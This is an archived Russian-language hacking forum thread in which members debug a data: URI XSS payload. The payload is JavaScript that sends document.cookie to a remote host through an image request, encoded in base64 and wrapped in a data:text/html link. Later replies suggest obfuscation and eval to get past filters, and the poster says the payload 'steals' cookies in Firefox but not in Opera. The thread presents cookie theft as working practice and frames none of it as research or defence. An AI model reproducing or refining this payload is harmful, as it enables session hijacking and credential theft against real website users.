PDA

Просмотр полной версии : xss через data

qaz
19.03.2011, 21:03
Всем привет я тут начал изучать метод хсс через протокала дата и у меня чёт не получилось

взял

img = new Image();img.src= "http://сайт.com/1/s.gif?"+document.cookie;

прекодировал

PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTtpbWcuc3JjPSAiaH R0cDovL9GB0LDQudGCLmNvbS8xL3MuZ2lmPyIrZG9jdW1lbnQu Y29va2llOzwvc2NyaXB0Pg==

перешол по ссылке

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTtpbW cuc3JjPSAiaHR0cDovL9GB0LDQudGCLmNvbS8xL3MuZ2lmPyIr ZG9jdW1lbnQuY29va2llOzwvc2NyaXB0Pg==

в ответ полный ноль, почему?(сайт изменино)
qaz
19.03.2011, 21:37
NemTaq said:
ты пробел кагбе убери)


убрал, непомогло.

Абсолютно везде надо уберать? Или гдето оставить?
XAMEHA
20.03.2011, 07:01
Возможно у тебя не та кодировка:


Code:
img = new Image();img.src= "http://б�аАаЙб�.com/1/s.gif?"+document.cookie;

А так всё у меня работает.
qaz
20.03.2011, 12:44
о, всё заработало, просто кодировщик учитывал пробел после ; который я не заметил, наверно из-за етого и не работало
qaz
28.11.2011, 20:43
тут маленький вопрос появился, у меня в опере код теперь не работает, а в мозиле пашет, это что получается, в опере дыру прикрыли?
vasykas
28.11.2011, 20:59
qaz said:
тут маленький вопрос появился, у меня в опере код теперь не работает, а в мозиле пашет, это что получается, в опере дыру прикрыли?


попробуй обфускацию этим

http://kaimi.ru/2011/03/crypt-javascript-html-vbs/
Osstudio
28.11.2011, 21:02
qaz said:
тут маленький вопрос появился, у меня в опере код теперь не работает, а в мозиле пашет, это что получается, в опере дыру прикрыли?


Лол По сути, это баги не браузера, а сайта.
qaz
28.11.2011, 21:18
Osstudio said:
Лол
По сути, это баги не браузера, а сайта.


сайта? по сути с одних и тех же сайтов с мозилы ворует а с оперы нет
vasykas
28.11.2011, 21:20
да да если

.php то надо чем то другим пробовать шифровать

если

.html другим

я методом тыка пробовал

бывает что в index.php html кода вообще нет

то тогда через eval

здесь по ходи по этой теме

/threadnav144505-1-10.html
qaz
28.11.2011, 21:33
vasykas said:
да да если
.php то надо чем то другим пробовать шифровать
если
.html другим
я методом тыка пробовал
бывает что в index.php html кода вообще нет
то тогда через
eval
здесь по ходи по этой теме
/threadnav144505-1-10.html


та не, думаю ето тут не при чём, вот захожу например сюда / в мозиле вбиваю код и куки записываются, если в опере то записывается только пробел
Osstudio
29.11.2011, 00:34
qaz said:
сайта? по сути с одних и тех же сайтов с мозилы ворует а с оперы нет


Просто когда в браузере прикрыта XSS, это навряд-ли можно назвать "Дырой"... Браузер все навсего выполняет скрипты